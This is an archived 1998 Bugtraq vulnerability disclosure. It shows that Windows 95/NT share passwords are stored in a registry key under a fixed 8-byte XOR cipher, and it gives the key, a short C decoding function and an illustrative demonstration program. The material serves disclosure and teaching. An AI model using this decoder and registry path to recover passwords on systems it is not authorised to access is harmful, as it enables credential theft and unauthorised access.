Windows share passwords are right there in the registry and poorly encrypted

Summary
Description: Share encryption is by a simple XOR and the passwords are stored in registry entries such as SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\Parm1enc.
Author: a42n8k9@redrose.net
Compromise: With local access to a windoze box you can determine the read-only and full access passwords to the file system/printer/etc. Also these passwords might be the same as for more important access (i.e. to company servers).
Vulnerable Systems: Windoze 95, NT
Date: 9 February 1998
Details


Date: Mon, 9 Feb 1998 01:32:25 -0500
From: a42n8k9@redrose.net
To: BUGTRAQ@NETSPACE.ORG
Subject: How one small flaw could lead to major problems

Greetings,

First off I would like to apologize to aleph1.  It would appear that an
original draft of this got sent direct, before I had completed my
thoughts on it.  I will try and be more careful when wielding a loaded
mouse.  (hope no one got hurt)

And now for the stuff ...

While perusing the rootshell.com site, I came across the file
"sharepw.c" under January's archive group.  The program demonstrates the
ability to decode the Windows95 "share-level" password.  Curious, I
downloaded the file and began to examine it.  The file itself weighs in
at 883 lines in length, though largely commented.  The code contains
what are termed "pairs", "quads", "blocks", and "tables" that are used
to decipher the password 'inline'.

Upon further examination, (by mere chance actually), I noticed an
alarming similarity developing between the coded and decoded passwords.
Someone please correct me if I am wrong, but it would seem that the
"share-level" password is nothing more than a Simple-XOR cipher.  With
this being the case, the 883 line program gets reduced to the few lines
you see below.

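#include <sys/types.h>  /* u_char, u_long */

/* Fixed 8-byte XOR key applied to the stored share password */
u_char key[] = { 0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a, };

/* Decode PW in place; PW must have room for Size + 1 bytes */
void CrackSharePW(u_char *PW, u_long Size) {
    if (Size > sizeof(key))   /* never index past the end of key[] */
        Size = sizeof(key);
    PW[Size] = '\0';
    while(Size--)
        PW[Size] ^= key[Size];
}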

The passwords can be found in the registry at:
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
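
Why a fixed-key XOR gives the stored value no protection, as an added example in C that is not part of the original post or of sharepw.c. It uses the key bytes from the post; the function names and sample passwords are constructed for illustration, and the 8-byte limit is assumed from the key length shown above.

```c
#include <stdio.h>
#include <string.h>

/* Key bytes exactly as given in the post above. */
static const unsigned char key[8] =
    { 0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a };

/* XOR is its own inverse, so one routine both encodes and decodes.
   Input longer than the key is truncated; returns bytes written. */
size_t share_xor(const unsigned char *in, size_t n, unsigned char *out) {
    if (n > sizeof key) n = sizeof key;
    for (size_t i = 0; i < n; i++) out[i] = in[i] ^ key[i];
    return n;
}

/* One known password and its stored form give the key: k = p ^ c. */
size_t recover_key(const unsigned char *plain, const unsigned char *stored,
                   size_t n, unsigned char *k) {
    for (size_t i = 0; i < n; i++) k[i] = plain[i] ^ stored[i];
    return n;
}

/* Stored values agree wherever the passwords agree, so reuse between
   two shares is visible without decoding anything. */
size_t shared_prefix(const unsigned char *a, size_t an,
                     const unsigned char *b, size_t bn) {
    size_t i = 0;
    while (i < an && i < bn && a[i] == b[i]) i++;
    return i;
}

int main(void) {
    /* Constructed sample passwords, not taken from any real system. */
    const unsigned char ro[] = "BACKUP", rw[] = "BACKUP99";
    unsigned char c1[8], c2[8], k[8];
    size_t n1 = share_xor(ro, strlen((const char *)ro), c1);
    size_t n2 = share_xor(rw, strlen((const char *)rw), c2);
    size_t nk = recover_key(rw, c2, n2, k);

    printf("stored read-only value:");
    for (size_t i = 0; i < n1; i++) printf(" %02x", c1[i]);
    printf("\nkey recovered from one known pair: %s\n",
           memcmp(k, key, nk) == 0 ? "matches" : "differs");
    printf("stored values share a %zu-byte prefix\n",
           shared_prefix(c1, n1, c2, n2));
    return 0;
}
```

Because the key never changes, the stored bytes are only as secret as the registry itself; the passwords kept there should be treated as exposed to anyone with local access and not reused for other accounts.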


This page is part of Fyodor's exploit world.